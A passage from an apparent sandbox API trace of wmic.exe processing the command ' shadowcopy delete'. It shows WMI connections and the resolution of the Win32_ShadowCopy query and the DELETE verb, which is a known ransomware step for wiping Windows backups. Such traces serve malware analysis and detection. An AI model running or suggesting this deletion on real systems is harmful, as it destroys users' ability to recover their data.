out: _Destination=0x183190) returned 0x0 [0095.089] malloc (_Size=0xc) returned 0x18fe58 [0095.089] malloc (_Size=0xc) returned 0x18fe70 [0095.090] malloc (_Size=0xc) returned 0x18fe88 [0095.090] malloc (_Size=0xc) returned 0x2352060 [0095.090] malloc (_Size=0x80) returned 0x23505b0 [0095.090] GetLocalTime (in: lpSystemTime=0x1cfd20 | out: lpSystemTime=0x1cfd20*(wYear=0x7e4, wMonth=0x5, wDayOfWeek=0x2, wDay=0x5, wHour=0x1, wMinute=0x11, wSecond=0x28, wMilliseconds=0xe)) [0095.090] _vsnwprintf (in: _Buffer=0x23505b0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1cfd00 | out: _Buffer="05-05-2020T01:17:40") returned 19 [0095.090] lstrlenW (lpString=" shadowcopy delete") returned 19 [0095.090] malloc (_Size=0x28) returned 0x1831c8 [0095.090] lstrlenW (lpString=" shadowcopy delete") returned 19 [0095.090] lstrlenW (lpString=" shadowcopy delete") returned 19 [0095.090] malloc (_Size=0x28) returned 0x1831f8 [0095.090] lstrlenW (lpString=" shadowcopy delete") returned 19 [0095.090] lstrlenW (lpString=" shadowcopy delete") returned 19 [0095.090] lstrlenW (lpString=" shadowcopy delete") returned 19 [0095.090] malloc (_Size=0x16) returned 0x18eb88 [0095.091] lstrlenW (lpString="shadowcopy") returned 10 [0095.091] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0095.091] malloc (_Size=0x16) returned 0x18eba8 [0095.091] malloc (_Size=0x4) returned 0x183228 [0095.091] free (_Block=0x0) [0095.091] free (_Block=0x18eb88) [0095.091] lstrlenW (lpString=" shadowcopy delete") returned 19 [0095.091] malloc (_Size=0xe) returned 0x2352078 [0095.091] lstrlenW (lpString="delete") returned 6 [0095.091] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0095.091] malloc (_Size=0xe) returned 0x2352090 [0095.091] malloc (_Size=0x8) returned 0x182f58 [0095.091] memmove_s (in: _Destination=0x182f58, _DestinationSize=0x4, _Source=0x183228, _SourceSize=0x4 | out: _Destination=0x182f58) returned 0x0 [0095.091] free (_Block=0x183228) [0095.091] free (_Block=0x0) [0095.091] free (_Block=0x2352078) [0095.091] malloc (_Size=0x8) returned 0x183228 [0095.091] lstrlenW (lpString="QUIT") returned 4 [0095.092] lstrlenW (lpString="shadowcopy") returned 10 [0095.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0095.092] lstrlenW (lpString="EXIT") returned 4 [0095.092] lstrlenW (lpString="shadowcopy") returned 10 [0095.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0095.092] free (_Block=0x183228) [0095.092] WbemLocator:IUnknown:AddRef (This=0x990828) returned 0x2 [0095.092] malloc (_Size=0x8) returned 0x183228 [0095.092] lstrlenW (lpString="/") returned 1 [0095.092] lstrlenW (lpString="shadowcopy") returned 10 [0095.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0095.092] lstrlenW (lpString="-") returned 1 [0095.092] lstrlenW (lpString="shadowcopy") returned 10 [0095.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0095.092] lstrlenW (lpString="CLASS") returned 5 [0095.092] lstrlenW (lpString="shadowcopy") returned 10 [0095.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0095.092] lstrlenW (lpString="PATH") returned 4 [0095.093] lstrlenW (lpString="shadowcopy") returned 10 [0095.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0095.093] lstrlenW (lpString="CONTEXT") returned 7 [0095.093] lstrlenW (lpString="shadowcopy") returned 10 [0095.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0095.093] lstrlenW (lpString="shadowcopy") returned 10 [0095.093] malloc (_Size=0x16) returned 0x18eb88 [0095.093] lstrlenW (lpString="shadowcopy") returned 10 [0095.093] GetCurrentThreadId () returned 0x864 [0095.093] ??0CHString@@QAE@XZ () returned 0x1cfc74 [0095.093] malloc (_Size=0xc) returned 0x2352078 [0095.093] malloc (_Size=0xc) returned 0x23520a8 [0095.093] WbemLocator:IWbemLocator:ConnectServer (in: This=0x990828, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xadc1e0 | out: ppNamespace=0xadc1e0*=0x99d00c) returned 0x0 [0095.912] free (_Block=0x23520a8) [0095.912] free (_Block=0x2352078) [0095.912] CoSetProxyBlanket (pProxy=0x99d00c, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0095.913] ??1CHString@@QAE@XZ () returned 0x75330504 [0095.913] GetCurrentThreadId () returned 0x864 [0095.913] ??0CHString@@QAE@XZ () returned 0x1cfc0c [0095.913] malloc (_Size=0xc) returned 0x2352078 [0095.914] malloc (_Size=0xc) returned 0x23520a8 [0095.914] malloc (_Size=0xc) returned 0x23520c0 [0095.914] malloc (_Size=0xc) returned 0x23520d8 [0095.914] SysStringLen (param_1="root\\cli") returned 0x8 [0095.914] SysStringLen (param_1="\\") returned 0x1 [0095.914] malloc (_Size=0xc) returned 0x23520f0 [0095.914] SysStringLen (param_1="root\\cli\\") returned 0x9 [0095.914] SysStringLen (param_1="ms_409") returned 0x6 [0095.915] free (_Block=0x23520d8) [0095.915] free (_Block=0x23520c0) [0095.915] free (_Block=0x23520a8) [0095.915] free (_Block=0x2352078) [0095.915] malloc (_Size=0xc) returned 0x2352078 [0095.915] WbemLocator:IWbemLocator:ConnectServer (in: This=0x990828, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xadc1e4 | out: ppNamespace=0xadc1e4*=0x99d064) returned 0x0 [0097.182] free (_Block=0x2352078) [0097.182] free (_Block=0x23520f0) [0097.183] ??1CHString@@QAE@XZ () returned 0x75330504 [0097.183] GetCurrentThreadId () returned 0x864 [0097.183] ??0CHString@@QAE@XZ () returned 0x1cfc78 [0097.183] malloc (_Size=0xc) returned 0x23520f0 [0097.183] malloc (_Size=0xc) returned 0x2352078 [0097.183] malloc (_Size=0xc) returned 0x23520a8 [0097.183] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0097.183] malloc (_Size=0x3a) returned 0x18feb0 [0097.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa91f7c, cbMultiByte=-1, lpWideCharStr=0x18feb0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0097.183] free (_Block=0x18feb0) [0097.183] malloc (_Size=0xc) returned 0x23520c0 [0097.183] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0097.184] SysStringLen (param_1="shadowcopy") returned 0xa [0097.184] malloc (_Size=0xc) returned 0x23520d8 [0097.184] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0097.184] SysStringLen (param_1="'") returned 0x1 [0097.184] free (_Block=0x23520c0) [0097.185] free (_Block=0x23520a8) [0097.185] free (_Block=0x2352078) [0097.185] free (_Block=0x23520f0) [0097.185] IWbemServices:GetObject (in: This=0x99d00c, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x1cfc74*=0x0, ppCallResult=0x0 | out: ppObject=0x1cfc74*=0x9a9a18, ppCallResult=0x0) returned 0x0 [0097.227] malloc (_Size=0xc) returned 0x23520f0 [0097.227] IWbemClassObject:Get (in: This=0x9a9a18, wszName="Target", lFlags=0, pVal=0x1cfc34*(varType=0x0, wReserved1=0x1c, wReserved2=0xe58c, wReserved3=0xac, varVal1=0xffffffff, varVal2=0xa9a03c), pType=0x0, plFlavor=0x0 | out: pVal=0x1cfc34*(varType=0x8, wReserved1=0x1c, wReserved2=0xe58c, wReserved3=0xac, varVal1="Select * from Win32_ShadowCopy", varVal2=0xa9a03c), pType=0x0, plFlavor=0x0) returned 0x0 [0097.227] free (_Block=0x23520f0) [0097.227] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0097.227] malloc (_Size=0x3e) returned 0x18feb0 [0097.227] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0097.228] malloc (_Size=0xc) returned 0x23520f0 [0097.228] IWbemClassObject:Get (in: This=0x9a9a18, wszName="PWhere", lFlags=0, pVal=0x1cfc34*(varType=0x0, wReserved1=0x1c, wReserved2=0xe58c, wReserved3=0xac, varVal1=0x454fec, varVal2=0xa9a03c), pType=0x0, plFlavor=0x0 | out: pVal=0x1cfc34*(varType=0x8, wReserved1=0x1c, wReserved2=0xe58c, wReserved3=0xac, varVal1=" Where ID = '#'", varVal2=0xa9a03c), pType=0x0, plFlavor=0x0) returned 0x0 [0097.228] free (_Block=0x23520f0) [0097.228] lstrlenW (lpString=" Where ID = '#'") returned 15 [0097.228] malloc (_Size=0x20) returned 0x18fef8 [0097.228] lstrlenW (lpString=" Where ID = '#'") returned 15 [0097.228] malloc (_Size=0xc) returned 0x23520f0 [0097.228] IWbemClassObject:Get (in: This=0x9a9a18, wszName="Connection", lFlags=0, pVal=0x1cfc34*(varType=0x0, wReserved1=0x1c, wReserved2=0xe58c, wReserved3=0xac, varVal1=0x4869d4, varVal2=0xa9a03c), pType=0x0, plFlavor=0x0 | out: pVal=0x1cfc34*(varType=0xd, wReserved1=0x1c, wReserved2=0xe58c, wReserved3=0xac, varVal1=0x9a9dd8, varVal2=0xa9a03c), pType=0x0, plFlavor=0x0) returned 0x0 [0097.231] free (_Block=0x23520f0) [0097.231] IUnknown:QueryInterface (in: This=0x9a9dd8, riid=0xa96b50*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1cfc6c | out: ppvObject=0x1cfc6c*=0x9a9dd8) returned 0x0 [0097.231] GetCurrentThreadId () returned 0x864 [0097.231] ??0CHString@@QAE@XZ () returned 0x1cfbe8 [0097.231] malloc (_Size=0xc) returned 0x23520f0 [0097.232] IWbemClassObject:Get (in: This=0x9a9dd8, wszName="Namespace", lFlags=0, pVal=0x1cfbb8*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x235, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cfbb8*(varType=0x8, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x235, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.232] free (_Block=0x23520f0) [0097.232] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0097.232] malloc (_Size=0x16) returned 0x18ebc8 [0097.232] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0097.232] malloc (_Size=0xc) returned 0x23520f0 [0097.232] IWbemClassObject:Get (in: This=0x9a9dd8, wszName="Locale", lFlags=0, pVal=0x1cfbb8*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x235, varVal1=0x495864, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cfbb8*(varType=0x8, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x235, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.232] free (_Block=0x23520f0) [0097.232] lstrlenW (lpString="ms_409") returned 6 [0097.232] malloc (_Size=0xe) returned 0x23520f0 [0097.232] lstrlenW (lpString="ms_409") returned 6 [0097.233] malloc (_Size=0xc) returned 0x2352078 [0097.233] IWbemClassObject:Get (in: This=0x9a9dd8, wszName="User", lFlags=0, pVal=0x1cfbb8*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x235, varVal1=0x495864, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cfbb8*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x235, varVal1=0x495864, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.233] free (_Block=0x2352078) [0097.233] malloc (_Size=0xc) returned 0x2352078 [0097.233] IWbemClassObject:Get (in: This=0x9a9dd8, wszName="Password", lFlags=0, pVal=0x1cfbb8*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x235, varVal1=0x495864, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cfbb8*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x235, varVal1=0x495864, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.233] free (_Block=0x2352078) [0097.233] malloc (_Size=0xc) returned 0x2352078 [0097.233] IWbemClassObject:Get (in: This=0x9a9dd8, wszName="Server", lFlags=0, pVal=0x1cfbb8*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x235, varVal1=0x495864, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cfbb8*(varType=0x8, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x235, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.233] free (_Block=0x2352078) [0097.234] lstrlenW (lpString=".") returned 1 [0097.234] malloc (_Size=0x4) returned 0x18ff20 [0097.234] lstrlenW (lpString=".") returned 1 [0097.234] malloc (_Size=0xc) returned 0x2352078 [0097.234] IWbemClassObject:Get (in: This=0x9a9dd8, wszName="Authority", lFlags=0, pVal=0x1cfbb8*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x235, varVal1=0x495864, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cfbb8*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x235, varVal1=0x495864, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.234] free (_Block=0x2352078) [0097.234] ??1CHString@@QAE@XZ () returned 0x75330504 [0097.234] IUnknown:Release (This=0x9a9dd8) returned 0x1 [0097.234] GetCurrentThreadId () returned 0x864 [0097.234] ??0CHString@@QAE@XZ () returned 0x1cfbe0 [0097.234] malloc (_Size=0xc) returned 0x2352078 [0097.234] IWbemClassObject:Get (in: This=0x9a9a18, wszName="__RELPATH", lFlags=0, pVal=0x1cfbc0*(varType=0x0, wReserved1=0x7505, wReserved2=0x0, wReserved3=0x99, varVal1=0x0, varVal2=0x9a9dd8), pType=0x0, plFlavor=0x0 | out: pVal=0x1cfbc0*(varType=0x8, wReserved1=0x7505, wReserved2=0x0, wReserved3=0x99, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0x9a9dd8), pType=0x0, plFlavor=0x0) returned 0x0 [0097.235] free (_Block=0x2352078) [0097.235] malloc (_Size=0xc) returned 0x2352078 [0097.235] GetCurrentThreadId () returned 0x864 [0097.235] ??0CHString@@QAE@XZ () returned 0x1cfb70 [0097.235] ??0CHString@@QAE@PBG@Z () returned 0x1cfb5c [0097.235] ??0CHString@@QAE@ABV0@@Z () returned 0x1cfafc [0097.235] ?Empty@CHString@@QAEXXZ () returned 0x75330510 [0097.235] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x18ff30 [0097.235] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0097.235] ?Left@CHString@@QBE?AV1@H@Z () returned 0x1cfadc [0097.235] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x1cfae0 [0097.236] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x1cfb5c [0097.236] ??1CHString@@QAE@XZ () returned 0x1 [0097.236] ??1CHString@@QAE@XZ () returned 0x1 [0097.236] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x1cfad8 [0097.236] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x1cfafc [0097.236] ??1CHString@@QAE@XZ () returned 0x1 [0097.236] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x18ff98 [0097.236] ?Find@CHString@@QBEHPBG@Z () returned 0xa [0097.236] ?Left@CHString@@QBE?AV1@H@Z () returned 0x1cfadc [0097.236] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x1cfae0 [0097.236] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x1cfb5c [0097.236] ??1CHString@@QAE@XZ () returned 0x1 [0097.236] ??1CHString@@QAE@XZ () returned 0x1 [0097.236] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x1cfad8 [0097.236] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x1cfafc [0097.237] ??1CHString@@QAE@XZ () returned 0x75330504 [0097.237] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x75330504 [0097.237] ??1CHString@@QAE@XZ () returned 0x75330504 [0097.237] malloc (_Size=0xc) returned 0x23520a8 [0097.237] malloc (_Size=0xc) returned 0x23520c0 [0097.237] malloc (_Size=0xc) returned 0x2352108 [0097.237] malloc (_Size=0xc) returned 0x2352120 [0097.237] malloc (_Size=0xc) returned 0x2352138 [0097.237] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0097.237] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0097.238] malloc (_Size=0xc) returned 0x2352150 [0097.238] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0097.238] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0097.238] malloc (_Size=0xc) returned 0x2352168 [0097.238] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0097.238] SysStringLen (param_1="\"") returned 0x1 [0097.238] free (_Block=0x2352150) [0097.239] free (_Block=0x2352138) [0097.239] free (_Block=0x2352120) [0097.239] free (_Block=0x2352108) [0097.239] free (_Block=0x23520c0) [0097.239] free (_Block=0x23520a8) [0097.239] IWbemServices:GetObject (in: This=0x99d064, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x1cfb78*=0x0, ppCallResult=0x0 | out: ppObject=0x1cfb78*=0x9a9e68, ppCallResult=0x0) returned 0x0 [0097.342] malloc (_Size=0xc) returned 0x23520a8 [0097.342] IWbemClassObject:Get (in: This=0x9a9e68, wszName="Text", lFlags=0, pVal=0x1cfb24*(varType=0x0, wReserved1=0x45, wReserved2=0x3954, wReserved3=0x45, varVal1=0x4e, varVal2=0xadc1e0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cfb24*(varType=0x2008, wReserved1=0x45, wReserved2=0x3954, wReserved3=0x45, varVal1=0x4784b8*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x488f40, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xadc1e0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.343] free (_Block=0x23520a8) [0097.343] SafeArrayGetLBound (in: psa=0x4784b8, nDim=0x1, plLbound=0x1cfb3c | out: plLbound=0x1cfb3c) returned 0x0 [0097.343] SafeArrayGetUBound (in: psa=0x4784b8, nDim=0x1, plUbound=0x1cfb38 | out: plUbound=0x1cfb38) returned 0x0 [0097.343] SafeArrayGetElement (in: psa=0x4784b8, rgIndices=0x1cfb9c, pv=0x1cfb64 | out: pv=0x1cfb64) returned 0x0 [0097.343] malloc (_Size=0xc) returned 0x23520a8 [0097.343] malloc (_Size=0xc) returned 0x23520c0 [0097.343] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0097.343] free (_Block=0x23520a8) [0097.344] IUnknown:Release (This=0x9a9e68) returned 0x0 [0097.344] free (_Block=0x2352168) [0097.344] ??1CHString@@QAE@XZ () returned 0x1 [0097.344] ??1CHString@@QAE@XZ () returned 0x75330504 [0097.344] free (_Block=0x2352078) [0097.344] ??1CHString@@QAE@XZ () returned 0x75330504 [0097.344] lstrlenW (lpString="Shadow copy management.") returned 23 [0097.344] malloc (_Size=0x30) returned 0x18ff30 [0097.344] lstrlenW (lpString="Shadow copy management.") returned 23 [0097.344] free (_Block=0x23520c0) [0097.344] IUnknown:Release (This=0x9a9a18) returned 0x0 [0097.345] free (_Block=0x23520d8) [0097.345] ??1CHString@@QAE@XZ () returned 0x75330504 [0097.345] lstrlenW (lpString="PATH") returned 4 [0097.345] lstrlenW (lpString="delete") returned 6 [0097.345] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0097.345] lstrlenW (lpString="WHERE") returned 5 [0097.345] lstrlenW (lpString="delete") returned 6 [0097.345] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0097.345] lstrlenW (lpString="(") returned 1 [0097.345] lstrlenW (lpString="delete") returned 6 [0097.345] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0097.345] lstrlenW (lpString="/") returned 1 [0097.346] lstrlenW (lpString="delete") returned 6 [0097.346] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0097.346] lstrlenW (lpString="-") returned 1 [0097.346] lstrlenW (lpString="delete") returned 6 [0097.346] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0097.346] malloc (_Size=0xc) returned 0x23520d8 [0097.346] lstrlenW (lpString="GET") returned 3 [0097.346] lstrlenW (lpString="delete") returned 6 [0097.346] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0097.346] lstrlenW (lpString="LIST") returned 4 [0097.346] lstrlenW (lpString="delete") returned 6 [0097.346] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0097.346] lstrlenW (lpString="SET") returned 3 [0097.347] lstrlenW (lpString="delete") returned 6 [0097.347] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0097.347] lstrlenW (lpString="CREATE") returned 6 [0097.347] lstrlenW (lpString="delete") returned 6 [0097.347] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0097.347] lstrlenW (lpString="CALL") returned 4 [0097.347] lstrlenW (lpString="delete") returned 6 [0097.347] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0097.347] lstrlenW (lpString="ASSOC") returned 5 [0097.347] lstrlenW (lpString="delete") returned 6 [0097.347] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0097.347] lstrlenW (lpString="DELETE") returned 6 [0097.347] lstrlenW (lpString="delete") returned 6 [0097.347] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0097.348] free (_Block=0x23520d8) [0097.348] lstrlenW (lpString="/") returned 1 [0097.348] lstrlenW (lpString="delete") returned 6 [0097.348] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0097.348] lstrlenW (lpString="-") returned 1 [0097.348] lstrlenW (lpString="delete") returned 6 [0097.348] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0097.348] lstrlenW (lpString="delete") returned 6 [0097.348] malloc (_Size=0xe) returned 0x23520d8 [0097.348] lstrlenW (lpString="delete") returned 6 [0097.348] lstrlenW (lpString="GET") returned 3 [0097.348] lstrlenW (lpString="delete") returned 6 [0097.348] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0097.349] lstrlenW (lpString="LIST") returned 4 [0097.349] lstrlenW (lpString="delete") returned 6 [0097.349] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0097.349] lstrlenW (lpString="SET") returned 3 [0097.349] lstrlenW (lpString="delete") returned 6 [0097.349] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0097.349] lstrlenW (lpString="CREATE") returned 6 [0097.349] lstrlenW (lpString="delete") returned 6 [0097.349] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0097.349] lstrlenW (lpString="CALL") returned 4 [0097.349] lstrlenW (lpString="delete") returned 6 [0097.349] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0097.349] lstrlenW (lpString="ASSOC") returned 5 [0097.349] lstrlenW (lpString="delete") returned 6 [0097.349] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0097.349] lstrlenW (lpString="DELETE") returned 6 [0097.349] lstrlenW (lpString="delete") returned 6 [0097.349] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0097.350] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0097.350] malloc (_Size=0x3e) returned 0x18ff68 [0097.350] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0097.350] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x49f73dea | out: _String="Select", _Context=0x49f73dea) returned="Select" [0097.350] malloc (_Size=0xc) returned 0x23520c0 [0097.350] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x49f73dea | out: _String=0x0, _Context=0x49f73dea) returned="*" [0097.350] lstrlenW (lpString="FROM") returned 4 [0097.350] lstrlenW (lpString="*") returned 1 [0097.350] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0097.350] malloc (_Size=0xc) returned 0x2352078 [0097.351] free (_Block=0x23520c0) [0097.351] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x49f73dea | out: _String=0x0, _Context=0x49f73dea) returned="from" [0097.351] lstrlenW (lpString="FROM") returned 4 [0097.351] lstrlenW (lpString="from") returned 4 [0097.351] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0097.351] malloc (_Size=0xc) returned 0x23520c0 [0097.351] free (_Block=0x2352078) [0097.351] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x49f73dea | out: _String=0x0, _Context=0x49f73dea) returned="Win32_ShadowCopy" [0097.351] malloc (_Size=0xc) returned 0x2352078 [0097.352] free (_Block=0x23520c0) [0097.352] free (_Block=0x18ff68) [0097.352] free (_Block=0x2352078) [0097.352] lstrlenW (lpString="SET") returned 3 [0097.352] lstrlenW (lpString="delete") returned 6 [0097.352] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0097.352] lstrlenW (lpString="CREATE") returned 6 [0097.352] lstrlenW (lpString="delete") returned 6 [0097.352] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0097.352] free (_Block=0x183228) [0097.353] malloc (_Size=0x4) returned 0x183228 [0097.353] lstrlenW (lpString="GET") returned 3 [0097.353] lstrlenW (lpString="delete") returned 6 [0097.353] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0097.353] lstrlenW (lpString="LIST") returned 4 [0097.353] lstrlenW (lpString="delete") returned 6 [0097.353] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0097.353] lstrlenW (lpString="ASSOC") returned 5 [0097.353] lstrlenW (lpString="delete") returned 6 [0097.353] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, 